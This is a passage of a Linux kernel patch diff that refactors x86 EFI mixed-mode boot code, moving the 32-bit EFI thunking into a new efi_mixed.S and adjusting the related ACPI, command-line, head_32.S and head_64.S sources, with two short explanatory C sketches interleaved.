+@@ -74,6 +74,11 @@ LDFLAGS_vmlinux += -z noexecstack
+ ifeq ($(CONFIG_LD_IS_BFD),y)
+ LDFLAGS_vmlinux += $(call ld-option,--no-warn-rwx-segments)
+ endif
++ifeq ($(CONFIG_EFI_STUB),y)
++# ensure that the static EFI stub library will be pulled in, even if it is
++# never referenced explicitly from the startup code
++LDFLAGS_vmlinux += -u efi_pe_entry
++endif
+ LDFLAGS_vmlinux += -T
+ 
+ hostprogs	:= mkpiggy
+@@ -100,7 +105,7 @@ vmlinux-objs-$(CONFIG_RANDOMIZE_BASE) += $(obj)/kaslr.o
+ ifdef CONFIG_X86_64
+ 	vmlinux-objs-y += $(obj)/ident_map_64.o
+ 	vmlinux-objs-y += $(obj)/idt_64.o $(obj)/idt_handlers_64.o
+-	vmlinux-objs-y += $(obj)/mem_encrypt.o
++	vmlinux-objs-$(CONFIG_AMD_MEM_ENCRYPT) += $(obj)/mem_encrypt.o
+ 	vmlinux-objs-y += $(obj)/pgtable_64.o
+ 	vmlinux-objs-$(CONFIG_AMD_MEM_ENCRYPT) += $(obj)/sev.o
+ endif
+@@ -108,11 +113,11 @@ endif
+ vmlinux-objs-$(CONFIG_ACPI) += $(obj)/acpi.o
+ vmlinux-objs-$(CONFIG_INTEL_TDX_GUEST) += $(obj)/tdx.o $(obj)/tdcall.o
+ 
+-vmlinux-objs-$(CONFIG_EFI_MIXED) += $(obj)/efi_thunk_$(BITS).o
+ vmlinux-objs-$(CONFIG_EFI) += $(obj)/efi.o
+-efi-obj-$(CONFIG_EFI_STUB) = $(objtree)/drivers/firmware/efi/libstub/lib.a
++vmlinux-objs-$(CONFIG_EFI_MIXED) += $(obj)/efi_mixed.o
++vmlinux-objs-$(CONFIG_EFI_STUB) += $(objtree)/drivers/firmware/efi/libstub/lib.a
+ 
+-$(obj)/vmlinux: $(vmlinux-objs-y) $(efi-obj-y) FORCE
++$(obj)/vmlinux: $(vmlinux-objs-y) FORCE
+ 	$(call if_changed,ld)
+ 
+ OBJCOPYFLAGS_vmlinux.bin :=  -R .comment -S
+diff --git a/arch/x86/boot/compressed/acpi.c b/arch/x86/boot/compressed/acpi.c
+index 9caf89063e775..55c98fdd67d2b 100644
+--- a/arch/x86/boot/compressed/acpi.c
++++ b/arch/x86/boot/compressed/acpi.c
+@@ -30,13 +30,13 @@ __efi_get_rsdp_addr(unsigned long cfg_tbl_pa, unsigned int cfg_tbl_len)
+ 	 * Search EFI system tables for RSDP. Preferred is ACPI_20_TABLE_GUID to
+ 	 * ACPI_TABLE_GUID because it has more features.
+ 	 */
+-	rsdp_addr = efi_find_vendor_table(boot_params, cfg_tbl_pa, cfg_tbl_len,
++	rsdp_addr = efi_find_vendor_table(boot_params_ptr, cfg_tbl_pa, cfg_tbl_len,
+ 					  ACPI_20_TABLE_GUID);
+ 	if (rsdp_addr)
+ 		return (acpi_physical_address)rsdp_addr;
+ 
+ 	/* No ACPI_20_TABLE_GUID found, fallback to ACPI_TABLE_GUID. */
+-	rsdp_addr = efi_find_vendor_table(boot_params, cfg_tbl_pa, cfg_tbl_len,
++	rsdp_addr = efi_find_vendor_table(boot_params_ptr, cfg_tbl_pa, cfg_tbl_len,
+ 					  ACPI_TABLE_GUID);
+ 	if (rsdp_addr)
+ 		return (acpi_physical_address)rsdp_addr;
+@@ -56,15 +56,15 @@ static acpi_physical_address efi_get_rsdp_addr(void)
+ 	enum efi_type et;
+ 	int ret;
+ 
+-	et = efi_get_type(boot_params);
++	et = efi_get_type(boot_params_ptr);
+ 	if (et == EFI_TYPE_NONE)
+ 		return 0;
+ 
+-	systab_pa = efi_get_system_table(boot_params);
++	systab_pa = efi_get_system_table(boot_params_ptr);
+ 	if (!systab_pa)
+ 		error("EFI support advertised, but unable to locate system table.");
+ 
+-	ret = efi_get_conf_table(boot_params, &cfg_tbl_pa, &cfg_tbl_len);
++	ret = efi_get_conf_table(boot_params_ptr, &cfg_tbl_pa, &cfg_tbl_len);
+ 	if (ret || !cfg_tbl_pa)
+ 		error("EFI config table not found.");
+ 
+@@ -156,7 +156,7 @@ acpi_physical_address get_rsdp_addr(void)
+ {
+ 	acpi_physical_address pa;
+ 
+-	pa = boot_params->acpi_rsdp_addr;
++	pa = boot_params_ptr->acpi_rsdp_addr;
+ 
+ 	if (!pa)
+ 		pa = efi_get_rsdp_addr();
+@@ -210,7 +210,7 @@ static unsigned long get_acpi_srat_table(void)
+ 	rsdp = (struct acpi_table_rsdp *)get_cmdline_acpi_rsdp();
+ 	if (!rsdp)
+ 		rsdp = (struct acpi_table_rsdp *)(long)
+-			boot_params->acpi_rsdp_addr;
++			boot_params_ptr->acpi_rsdp_addr;
+ 
+ 	if (!rsdp)
+ 		return 0;
+diff --git a/arch/x86/boot/compressed/cmdline.c b/arch/x86/boot/compressed/cmdline.c
+index f1add5d85da9d..c1bb180973ea2 100644
+--- a/arch/x86/boot/compressed/cmdline.c
++++ b/arch/x86/boot/compressed/cmdline.c
+@@ -14,9 +14,9 @@ static inline char rdfs8(addr_t addr)
+ #include "../cmdline.c"
+ unsigned long get_cmd_line_ptr(void)
+ {
+-	unsigned long cmd_line_ptr = boot_params->hdr.cmd_line_ptr;
++	unsigned long cmd_line_ptr = boot_params_ptr->hdr.cmd_line_ptr;
+ 
+-	cmd_line_ptr |= (u64)boot_params->ext_cmd_line_ptr << 32;
++	cmd_line_ptr |= (u64)boot_params_ptr->ext_cmd_line_ptr << 32;
+ 
+ 	return cmd_line_ptr;
+ }
+diff --git a/arch/x86/boot/compressed/efi_mixed.S b/arch/x86/boot/compressed/efi_mixed.S
+new file mode 100644
+index 0000000000000..8232c5b2a9bf5
+--- /dev/null
++++ b/arch/x86/boot/compressed/efi_mixed.S
+@@ -0,0 +1,328 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Copyright (C) 2014, 2015 Intel Corporation; author Matt Fleming
++ *
++ * Early support for invoking 32-bit EFI services from a 64-bit kernel.
++ *
++ * Because this thunking occurs before ExitBootServices() we have to
++ * restore the firmware's 32-bit GDT and IDT before we make EFI service
++ * calls.
++ *
++ * On the plus side, we don't have to worry about mangling 64-bit
++ * addresses into 32-bits because we're executing with an identity
++ * mapped pagetable and haven't transitioned to 64-bit virtual addresses
++ * yet.
++ */
++
++#include <linux/linkage.h>
++#include <asm/msr.h>
++#include <asm/page_types.h>
++#include <asm/processor-flags.h>
++#include <asm/segment.h>
++
++	.code64
++	.text
++/*
++ * When booting in 64-bit mode on 32-bit EFI firmware, startup_64_mixed_mode()
++ * is the first thing that runs after switching to long mode. Depending on
++ * whether the EFI handover protocol or the compat entry point was used to
++ * enter the kernel, it will either branch to the common 64-bit EFI stub
++ * entrypoint efi_stub_entry() directly, or via the 64-bit EFI PE/COFF
++ * entrypoint efi_pe_entry(). In the former case, the bootloader must provide a
++ * struct bootparams pointer as the third argument, so the presence of such a
++ * pointer is used to disambiguate.
++ *
++ *                                                             +--------------+
++ *  +------------------+     +------------+            +------>| efi_pe_entry |
++ *  | efi32_pe_entry   |---->|            |            |       +-----------+--+
++ *  +------------------+     |            |     +------+----------------+  |
++ *                           | startup_32 |---->| startup_64_mixed_mode |  |
++ *  +------------------+     |            |     +------+----------------+  |
++ *  | efi32_stub_entry |---->|            |            |                   |
++ *  +------------------+     +------------+            |                   |
++ *                                                     V                   |
++ *                           +------------+     +----------------+         |
++ *                           | startup_64 |<----| efi_stub_entry |<--------+
++ *                           +------------+     +----------------+
++ */
++SYM_FUNC_START(startup_64_mixed_mode)
++	lea	efi32_boot_args(%rip), %rdx
++	mov	0(%rdx), %edi
++	mov	4(%rdx), %esi
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++	mov	8(%rdx), %edx		// saved bootparams pointer
++	test	%edx, %edx
++	jnz	efi_stub_entry
++#endif
++	/*
++	 * efi_pe_entry uses MS calling convention, which requires 32 bytes of
++	 * shadow space on the stack even if all arguments are passed in
++	 * registers. We also need an additional 8 bytes for the space that
++	 * would be occupied by the return address, and this also results in
++	 * the correct stack alignment for entry.
++	 */
++	sub	$40, %rsp
++	mov	%rdi, %rcx		// MS calling convention
++	mov	%rsi, %rdx
++	jmp	efi_pe_entry
++SYM_FUNC_END(startup_64_mixed_mode)
++
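
For reference, the memory that startup_64_mixed_mode() reads back at offsets 0, 4 and 8 of efi32_boot_args is what efi32_entry() stored on the way in (the efi_is64 byte follows at offset 12). A C view of that layout might look like this sketch (the struct name is hypothetical; the real symbol is plain .long data in assembly):

#include <stdint.h>

struct efi32_boot_args {
	uint32_t image_handle;	/* saved %ecx, offset 0 */
	uint32_t sys_table;	/* saved %edx, offset 4 */
	uint32_t boot_params;	/* saved %esi, offset 8; zero unless the EFI
				 * handover protocol was used, which is how
				 * startup_64_mixed_mode() disambiguates */
};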
++SYM_FUNC_START(__efi64_thunk)
++	push	%rbp
++	push	%rbx
++
++	movl	%ds, %eax
++	push	%rax
++	movl	%es, %eax
++	push	%rax
++	movl	%ss, %eax
++	push	%rax
++
++	/* Copy args passed on stack */
++	movq	0x30(%rsp), %rbp
++	movq	0x38(%rsp), %rbx
++	movq	0x40(%rsp), %rax
++
++	/*
++	 * Convert x86-64 ABI params to i386 ABI
++	 */
++	subq	$64, %rsp
++	movl	%esi, 0x0(%rsp)
++	movl	%edx, 0x4(%rsp)
++	movl	%ecx, 0x8(%rsp)
++	movl	%r8d, 0xc(%rsp)
++	movl	%r9d, 0x10(%rsp)
++	movl	%ebp, 0x14(%rsp)
++	movl	%ebx, 0x18(%rsp)
++	movl	%eax, 0x1c(%rsp)
++
++	leaq	0x20(%rsp), %rbx
++	sgdt	(%rbx)
++	sidt	16(%rbx)
++
++	leaq	1f(%rip), %rbp
++
++	/*
++	 * Switch to IDT and GDT with 32-bit segments. These are the firmware
++	 * GDT and IDT that were installed when the kernel started executing.
++	 * The pointers were saved by the efi32_entry() routine below.
++	 *
++	 * Pass the saved DS selector to the 32-bit code, and use far return to
++	 * restore the saved CS selector.
++	 */
++	lidt	efi32_boot_idt(%rip)
++	lgdt	efi32_boot_gdt(%rip)
++
++	movzwl	efi32_boot_ds(%rip), %edx
++	movzwq	efi32_boot_cs(%rip), %rax
++	pushq	%rax
++	leaq	efi_enter32(%rip), %rax
++	pushq	%rax
++	lretq
++
++1:	addq	$64, %rsp
++	movq	%rdi, %rax
++
++	pop	%rbx
++	movl	%ebx, %ss
++	pop	%rbx
++	movl	%ebx, %es
++	pop	%rbx
++	movl	%ebx, %ds
++	/* Clear out 32-bit selector from FS and GS */
++	xorl	%ebx, %ebx
++	movl	%ebx, %fs
++	movl	%ebx, %gs
++
++	/*
++	 * Convert 32-bit status code into 64-bit.
++	 */
++	roll	$1, %eax
++	rorq	$1, %rax
++
++	pop	%rbx
++	pop	%rbp
++	RET
++SYM_FUNC_END(__efi64_thunk)
++
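
The roll/rorq pair at the end of __efi64_thunk() migrates the 32-bit EFI error flag (bit 31) into bit 63, where the 64-bit EFI_ERROR() convention expects it, while leaving the low-order code bits intact. An equivalent C expression (a sketch, not kernel code):

#include <stdint.h>

static uint64_t efi64_status(uint32_t status32)
{
	/* roll $1, %eax : bit 31 -> bit 0, bits 0..30 -> bits 1..31
	 * rorq $1, %rax : bit 0 -> bit 63, bits 1..31 -> bits 0..30
	 * Net effect: the error flag moves from bit 31 to bit 63. */
	return (status32 & 0x7fffffffULL) |
	       ((uint64_t)(status32 & 0x80000000ULL) << 32);
}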
++	.code32
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++SYM_FUNC_START(efi32_stub_entry)
++	call	1f
++1:	popl	%ecx
++
++	/* Clear BSS */
++	xorl	%eax, %eax
++	leal	(_bss - 1b)(%ecx), %edi
++	leal	(_ebss - 1b)(%ecx), %ecx
++	subl	%edi, %ecx
++	shrl	$2, %ecx
++	cld
++	rep	stosl
++
++	add	$0x4, %esp		/* Discard return address */
++	popl	%ecx
++	popl	%edx
++	popl	%esi
++	jmp	efi32_entry
++SYM_FUNC_END(efi32_stub_entry)
++#endif
++
++/*
++ * EFI service pointer must be in %edi.
++ *
++ * The stack should represent the 32-bit calling convention.
++ */
++SYM_FUNC_START_LOCAL(efi_enter32)
++	/* Load firmware selector into data and stack segment registers */
++	movl	%edx, %ds
++	movl	%edx, %es
++	movl	%edx, %fs
++	movl	%edx, %gs
++	movl	%edx, %ss
++
++	/* Reload pgtables */
++	movl	%cr3, %eax
++	movl	%eax, %cr3
++
++	/* Disable paging */
++	movl	%cr0, %eax
++	btrl	$X86_CR0_PG_BIT, %eax
++	movl	%eax, %cr0
++
++	/* Disable long mode via EFER */
++	movl	$MSR_EFER, %ecx
++	rdmsr
++	btrl	$_EFER_LME, %eax
++	wrmsr
++
++	call	*%edi
++
++	/* We must preserve return value */
++	movl	%eax, %edi
++
++	/*
++	 * Some firmware will return with interrupts enabled. Be sure to
++	 * disable them before we switch GDTs and IDTs.
++	 */
++	cli
++
++	lidtl	16(%ebx)
++	lgdtl	(%ebx)
++
++	movl	%cr4, %eax
++	btsl	$(X86_CR4_PAE_BIT), %eax
++	movl	%eax, %cr4
++
++	movl	%cr3, %eax
++	movl	%eax, %cr3
++
++	movl	$MSR_EFER, %ecx
++	rdmsr
++	btsl	$_EFER_LME, %eax
++	wrmsr
++
++	xorl	%eax, %eax
++	lldt	%ax
++
++	pushl	$__KERNEL_CS
++	pushl	%ebp
++
++	/* Enable paging */
++	movl	%cr0, %eax
++	btsl	$X86_CR0_PG_BIT, %eax
++	movl	%eax, %cr0
++	lret
++SYM_FUNC_END(efi_enter32)
++
++/*
++ * This is the common EFI stub entry point for mixed mode.
++ *
++ * Arguments:	%ecx	image handle
++ * 		%edx	EFI system table pointer
++ *		%esi	struct bootparams pointer (or NULL when not using
++ *			the EFI handover protocol)
++ *
++ * Since this is the point of no return for ordinary execution, no registers
++ * are considered live except for the function parameters. [Note that the EFI
++ * stub may still exit and return to the firmware using the Exit() EFI boot
++ * service.]
++ */
++SYM_FUNC_START_LOCAL(efi32_entry)
++	call	1f
++1:	pop	%ebx
++
++	/* Save firmware GDTR and code/data selectors */
++	sgdtl	(efi32_boot_gdt - 1b)(%ebx)
++	movw	%cs, (efi32_boot_cs - 1b)(%ebx)
++	movw	%ds, (efi32_boot_ds - 1b)(%ebx)
++
++	/* Store firmware IDT descriptor */
++	sidtl	(efi32_boot_idt - 1b)(%ebx)
++
++	/* Store boot arguments */
++	leal	(efi32_boot_args - 1b)(%ebx), %ebx
++	movl	%ecx, 0(%ebx)
++	movl	%edx, 4(%ebx)
++	movl	%esi, 8(%ebx)
++	movb	$0x0, 12(%ebx)          // efi_is64
++
++	/* Disable paging */
++	movl	%cr0, %eax
++	btrl	$X86_CR0_PG_BIT, %eax
++	movl	%eax, %cr0
++
++	jmp	startup_32
++SYM_FUNC_END(efi32_entry)
++
++/*
++ * efi_status_t efi32_pe_entry(efi_handle_t image_handle,
++ *			       efi_system_table_32_t *sys_table)
++ */
++SYM_FUNC_START(efi32_pe_entry)
++	pushl	%ebp
++	movl	%esp, %ebp
++	pushl	%ebx				// save callee-save registers
++	pushl	%edi
++
++	call	verify_cpu			// check for long mode support
++	testl	%eax, %eax
++	movl	$0x80000003, %eax		// EFI_UNSUPPORTED
++	jnz	2f
++
++	movl	8(%ebp), %ecx			// image_handle
++	movl	12(%ebp), %edx			// sys_table
++	xorl	%esi, %esi
++	jmp	efi32_entry			// pass %ecx, %edx, %esi
++						// no other registers remain live
++
++2:	popl	%edi				// restore callee-save registers
++	popl	%ebx
++	leave
++	RET
++SYM_FUNC_END(efi32_pe_entry)
++
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++	.org	efi32_stub_entry + 0x200
++	.code64
++SYM_FUNC_START_NOALIGN(efi64_stub_entry)
++	jmp	efi_handover_entry
++SYM_FUNC_END(efi64_stub_entry)
++#endif
++
++	.data
++	.balign	8
++SYM_DATA_START_LOCAL(efi32_boot_gdt)
++	.word	0
++	.quad	0
++SYM_DATA_END(efi32_boot_gdt)
++
++SYM_DATA_START_LOCAL(efi32_boot_idt)
++	.word	0
++	.quad	0
++SYM_DATA_END(efi32_boot_idt)
++
++SYM_DATA_LOCAL(efi32_boot_cs, .word 0)
++SYM_DATA_LOCAL(efi32_boot_ds, .word 0)
++SYM_DATA_LOCAL(efi32_boot_args, .long 0, 0, 0)
++SYM_DATA(efi_is64, .byte 1)
+diff --git a/arch/x86/boot/compressed/efi_thunk_64.S b/arch/x86/boot/compressed/efi_thunk_64.S
+deleted file mode 100644
+index 67e7edcdfea8f..0000000000000
+--- a/arch/x86/boot/compressed/efi_thunk_64.S
++++ /dev/null
+@@ -1,195 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (C) 2014, 2015 Intel Corporation; author Matt Fleming
+- *
+- * Early support for invoking 32-bit EFI services from a 64-bit kernel.
+- *
+- * Because this thunking occurs before ExitBootServices() we have to
+- * restore the firmware's 32-bit GDT and IDT before we make EFI service
+- * calls.
+- *
+- * On the plus side, we don't have to worry about mangling 64-bit
+- * addresses into 32-bits because we're executing with an identity
+- * mapped pagetable and haven't transitioned to 64-bit virtual addresses
+- * yet.
+- */
+-
+-#include <linux/linkage.h>
+-#include <asm/msr.h>
+-#include <asm/page_types.h>
+-#include <asm/processor-flags.h>
+-#include <asm/segment.h>
+-
+-	.code64
+-	.text
+-SYM_FUNC_START(__efi64_thunk)
+-	push	%rbp
+-	push	%rbx
+-
+-	movl	%ds, %eax
+-	push	%rax
+-	movl	%es, %eax
+-	push	%rax
+-	movl	%ss, %eax
+-	push	%rax
+-
+-	/* Copy args passed on stack */
+-	movq	0x30(%rsp), %rbp
+-	movq	0x38(%rsp), %rbx
+-	movq	0x40(%rsp), %rax
+-
+-	/*
+-	 * Convert x86-64 ABI params to i386 ABI
+-	 */
+-	subq	$64, %rsp
+-	movl	%esi, 0x0(%rsp)
+-	movl	%edx, 0x4(%rsp)
+-	movl	%ecx, 0x8(%rsp)
+-	movl	%r8d, 0xc(%rsp)
+-	movl	%r9d, 0x10(%rsp)
+-	movl	%ebp, 0x14(%rsp)
+-	movl	%ebx, 0x18(%rsp)
+-	movl	%eax, 0x1c(%rsp)
+-
+-	leaq	0x20(%rsp), %rbx
+-	sgdt	(%rbx)
+-
+-	addq	$16, %rbx
+-	sidt	(%rbx)
+-
+-	leaq	1f(%rip), %rbp
+-
+-	/*
+-	 * Switch to IDT and GDT with 32-bit segments. This is the firmware GDT
+-	 * and IDT that was installed when the kernel started executing. The
+-	 * pointers were saved at the EFI stub entry point in head_64.S.
+-	 *
+-	 * Pass the saved DS selector to the 32-bit code, and use far return to
+-	 * restore the saved CS selector.
+-	 */
+-	leaq	efi32_boot_idt(%rip), %rax
+-	lidt	(%rax)
+-	leaq	efi32_boot_gdt(%rip), %rax
+-	lgdt	(%rax)
+-
+-	movzwl	efi32_boot_ds(%rip), %edx
+-	movzwq	efi32_boot_cs(%rip), %rax
+-	pushq	%rax
+-	leaq	efi_enter32(%rip), %rax
+-	pushq	%rax
+-	lretq
+-
+-1:	addq	$64, %rsp
+-	movq	%rdi, %rax
+-
+-	pop	%rbx
+-	movl	%ebx, %ss
+-	pop	%rbx
+-	movl	%ebx, %es
+-	pop	%rbx
+-	movl	%ebx, %ds
+-	/* Clear out 32-bit selector from FS and GS */
+-	xorl	%ebx, %ebx
+-	movl	%ebx, %fs
+-	movl	%ebx, %gs
+-
+-	/*
+-	 * Convert 32-bit status code into 64-bit.
+-	 */
+-	roll	$1, %eax
+-	rorq	$1, %rax
+-
+-	pop	%rbx
+-	pop	%rbp
+-	RET
+-SYM_FUNC_END(__efi64_thunk)
+-
+-	.code32
+-/*
+- * EFI service pointer must be in %edi.
+- *
+- * The stack should represent the 32-bit calling convention.
+- */
+-SYM_FUNC_START_LOCAL(efi_enter32)
+-	/* Load firmware selector into data and stack segment registers */
+-	movl	%edx, %ds
+-	movl	%edx, %es
+-	movl	%edx, %fs
+-	movl	%edx, %gs
+-	movl	%edx, %ss
+-
+-	/* Reload pgtables */
+-	movl	%cr3, %eax
+-	movl	%eax, %cr3
+-
+-	/* Disable paging */
+-	movl	%cr0, %eax
+-	btrl	$X86_CR0_PG_BIT, %eax
+-	movl	%eax, %cr0
+-
+-	/* Disable long mode via EFER */
+-	movl	$MSR_EFER, %ecx
+-	rdmsr
+-	btrl	$_EFER_LME, %eax
+-	wrmsr
+-
+-	call	*%edi
+-
+-	/* We must preserve return value */
+-	movl	%eax, %edi
+-
+-	/*
+-	 * Some firmware will return with interrupts enabled. Be sure to
+-	 * disable them before we switch GDTs and IDTs.
+-	 */
+-	cli
+-
+-	lidtl	(%ebx)
+-	subl	$16, %ebx
+-
+-	lgdtl	(%ebx)
+-
+-	movl	%cr4, %eax
+-	btsl	$(X86_CR4_PAE_BIT), %eax
+-	movl	%eax, %cr4
+-
+-	movl	%cr3, %eax
+-	movl	%eax, %cr3
+-
+-	movl	$MSR_EFER, %ecx
+-	rdmsr
+-	btsl	$_EFER_LME, %eax
+-	wrmsr
+-
+-	xorl	%eax, %eax
+-	lldt	%ax
+-
+-	pushl	$__KERNEL_CS
+-	pushl	%ebp
+-
+-	/* Enable paging */
+-	movl	%cr0, %eax
+-	btsl	$X86_CR0_PG_BIT, %eax
+-	movl	%eax, %cr0
+-	lret
+-SYM_FUNC_END(efi_enter32)
+-
+-	.data
+-	.balign	8
+-SYM_DATA_START(efi32_boot_gdt)
+-	.word	0
+-	.quad	0
+-SYM_DATA_END(efi32_boot_gdt)
+-
+-SYM_DATA_START(efi32_boot_idt)
+-	.word	0
+-	.quad	0
+-SYM_DATA_END(efi32_boot_idt)
+-
+-SYM_DATA_START(efi32_boot_cs)
+-	.word	0
+-SYM_DATA_END(efi32_boot_cs)
+-
+-SYM_DATA_START(efi32_boot_ds)
+-	.word	0
+-SYM_DATA_END(efi32_boot_ds)
+diff --git a/arch/x86/boot/compressed/head_32.S b/arch/x86/boot/compressed/head_32.S
+index 3b354eb9516df..1cfe9802a42fe 100644
+--- a/arch/x86/boot/compressed/head_32.S
++++ b/arch/x86/boot/compressed/head_32.S
+@@ -84,19 +84,6 @@ SYM_FUNC_START(startup_32)
+ 
+ #ifdef CONFIG_RELOCATABLE
+ 	leal	startup_32@GOTOFF(%edx), %ebx
+-
+-#ifdef CONFIG_EFI_STUB
+-/*
+- * If we were loaded via the EFI LoadImage service, startup_32() will be at an
+- * offset to the start of the space allocated for the image. efi_pe_entry() will
+- * set up image_offset to tell us where the image actually starts, so that we
+- * can use the full available buffer.
+- *	image_offset = startup_32 - image_base
+- * Otherwise image_offset will be zero and has no effect on the calculations.
+- */
+-	subl    image_offset@GOTOFF(%edx), %ebx
+-#endif
+-
+ 	movl	BP_kernel_alignment(%esi), %eax
+ 	decl	%eax
+ 	addl    %eax, %ebx
+@@ -150,17 +137,6 @@ SYM_FUNC_START(startup_32)
+ 	jmp	*%eax
+ SYM_FUNC_END(startup_32)
+ 
+-#ifdef CONFIG_EFI_STUB
+-SYM_FUNC_START(efi32_stub_entry)
+-	add	$0x4, %esp
+-	movl	8(%esp), %esi	/* save boot_params pointer */
+-	call	efi_main
+-	/* efi_main returns the possibly relocated address of startup_32 */
+-	jmp	*%eax
+-SYM_FUNC_END(efi32_stub_entry)
+-SYM_FUNC_ALIAS(efi_stub_entry, efi32_stub_entry)
+-#endif
+-
+ 	.text
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+ 
+@@ -179,15 +155,9 @@ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+  */
+ 	/* push arguments for extract_kernel: */
+ 
+-	pushl	output_len@GOTOFF(%ebx)	/* decompressed length, end of relocs */
+ 	pushl	%ebp			/* output address */
+-	pushl	input_len@GOTOFF(%ebx)	/* input_len */
+-	leal	input_data@GOTOFF(%ebx), %eax
+-	pushl	%eax			/* input_data */
+-	leal	boot_heap@GOTOFF(%ebx), %eax
+-	pushl	%eax			/* heap area */
+ 	pushl	%esi			/* real mode pointer */
+-	call	extract_kernel		/* returns kernel location in %eax */
++	call	extract_kernel		/* returns kernel entry point in %eax */
+ 	addl	$24, %esp
+ 
+ /*
+@@ -208,17 +178,11 @@ SYM_DATA_START_LOCAL(gdt)
+ 	.quad	0x00cf92000000ffff	/* __KERNEL_DS */
+ SYM_DATA_END_LABEL(gdt, SYM_L_LOCAL, gdt_end)
+ 
+-#ifdef CONFIG_EFI_STUB
+-SYM_DATA(image_offset, .long 0)
+-#endif
+-
+ /*
+  * Stack and heap for uncompression
+  */
+ 	.bss
+ 	.balign 4
+-boot_heap:
+-	.fill BOOT_HEAP_SIZE, 1, 0
+ boot_stack:
+ 	.fill BOOT_STACK_SIZE, 1, 0
+ boot_stack_end:
+diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S
+index b4bd6df29116f..0d7aef10b19ad 100644
+--- a/arch/x86/boot/compressed/head_64.S
++++ b/arch/x86/boot/compressed/head_64.S
+@@ -118,7 +118,9 @@ SYM_FUNC_START(startup_32)
+ 1:
+ 
+ 	/* Setup Exception handling for SEV-ES */
++#ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	call	startup32_load_idt
++#endif
+ 
+ 	/* Make sure cpu supports long mode. */
+ 	call	verify_cpu
+@@ -136,19 +138,6 @@ SYM_FUNC_START(startup_32)
+ 
+ #ifdef CONFIG_RELOCATABLE
+ 	movl	%ebp, %ebx
+-
+-#ifdef CONFIG_EFI_STUB
+-/*
+- * If we were loaded via the EFI LoadImage service, startup_32 will be at an
+- * offset to the start of the space allocated for the image. efi_pe_entry will
+- * set up image_offset to tell us where the image actually starts, so that we
+- * can use the full available buffer.
+- *	image_offset = startup_32 - image_base
+- * Otherwise image_offset will be zero and has no effect on the calculations.
+- */
+-	subl    rva(image_offset)(%ebp), %ebx
+-#endif
+-
+ 	movl	BP_kernel_alignment(%esi), %eax
+ 	decl	%eax
+ 	addl	%eax, %ebx
+@@ -178,12 +167,13 @@ SYM_FUNC_START(startup_32)
+   */
+ 	/*
+ 	 * If SEV is active then set the encryption mask in the page tables.
+-	 * This will insure that when the kernel is copied and decompressed
++	 * This will ensure that when the kernel is copied and decompressed
+ 	 * it will be done so encrypted.
+ 	 */
+-	call	get_sev_encryption_bit
+ 	xorl	%edx, %edx
+ #ifdef	CONFIG_AMD_MEM_ENCRYPT
++	call	get_sev_encryption_bit
++	xorl	%edx, %edx
+ 	testl	%eax, %eax
+ 	jz	1f
+ 	subl	$32, %eax	/* Encryption bit is always above bit 31 */
+@@ -249,6 +239,11 @@ SYM_FUNC_START(startup_32)
+ 	movl    $__BOOT_TSS, %eax
+ 	ltr	%ax
+ 
++#ifdef CONFIG_AMD_MEM_ENCRYPT
++	/* Check if the C-bit position is correct when SEV is active */
++	call	startup32_check_sev_cbit
++#endif
++
+ 	/*
+ 	 * Setup for the jump to 64bit mode
+ 	 *
+@@ -261,29 +256,11 @@ SYM_FUNC_START(startup_32)
+ 	 */
+ 	leal	rva(startup_64)(%ebp), %eax
+ #ifdef CONFIG_EFI_MIXED
+-	movl	rva(efi32_boot_args)(%ebp), %edi
+-	testl	%edi, %edi
+-	jz	1f
+-	leal	rva(efi64_stub_entry)(%ebp), %eax
+-	movl	rva(efi32_boot_args+4)(%ebp), %esi
+-	movl	rva(efi32_boot_args+8)(%ebp), %edx	// saved bootparams pointer
+-	testl	%edx, %edx
+-	jnz	1f
+-	/*
+-	 * efi_pe_entry uses MS calling convention, which requires 32 bytes of
+-	 * shadow space on the stack even if all arguments are passed in
+-	 * registers. We also need an additional 8 bytes for the space that
+-	 * would be occupied by the return address, and this also results in
+-	 * the correct stack alignment for entry.
+-	 */
+-	subl	$40, %esp
+-	leal	rva(efi_pe_entry)(%ebp), %eax
+-	movl	%edi, %ecx			// MS calling convention
+-	movl	%esi, %edx
++	cmpb	$1, rva(efi_is64)(%ebp)
++	je	1f
++	leal	rva(startup_64_mixed_mode)(%ebp), %eax
+ 1:
+ #endif
+-	/* Check if the C-bit position is correct when SEV is active */
+-	call	startup32_check_sev_cbit
+ 
+ 	pushl	$__KERNEL_CS
+ 	pushl	%eax
+@@ -296,41 +273,6 @@ SYM_FUNC_START(startup_32)
+ 	lret
+ SYM_FUNC_END(startup_32)
+ 
+-#ifdef CONFIG_EFI_MIXED
+-	.org 0x190
+-SYM_FUNC_START(efi32_stub_entry)
+-	add	$0x4, %esp		/* Discard return address */
+-	popl	%ecx
+-	popl	%edx
+-	popl	%esi
+-
+-	call	1f
+-1:	pop	%ebp
+-	subl	$ rva(1b), %ebp
+-
+-	movl	%esi, rva(efi32_boot_args+8)(%ebp)
+-SYM_INNER_LABEL(efi32_pe_stub_entry, SYM_L_LOCAL)
+-	movl	%ecx, rva(efi32_boot_args)(%ebp)
+-	movl	%edx, rva(efi32_boot_args+4)(%ebp)
+-	movb	$0, rva(efi_is64)(%ebp)
+-
+-	/* Save firmware GDTR and code/data selectors */
+-	sgdtl	rva(efi32_boot_gdt)(%ebp)
+-	movw	%cs, rva(efi32_boot_cs)(%ebp)
+-	movw	%ds, rva(efi32_boot_ds)(%ebp)
+-
+-	/* Store firmware IDT descriptor */
+-	sidtl	rva(efi32_boot_idt)(%ebp)
+-
+-	/* Disable paging */
+-	movl	%cr0, %eax
+-	btrl	$X86_CR0_PG_BIT, %eax
+-	movl	%eax, %cr0
+-
+-	jmp	startup_32
+-SYM_FUNC_END(efi32_stub_entry)
+-#endif
+-
+ 	.code64
+ 	.org 0x200
+ SYM_CODE_START(startup_64)
+@@ -372,20 +314,6 @@ SYM_CODE_START(startup_64)
+ 	/* Start with the delta to where the kernel will run at. */
+ #ifdef CONFIG_RELOCATABLE
+ 	leaq	startup_32(%rip) /* - $startup_32 */, %rbp
+-
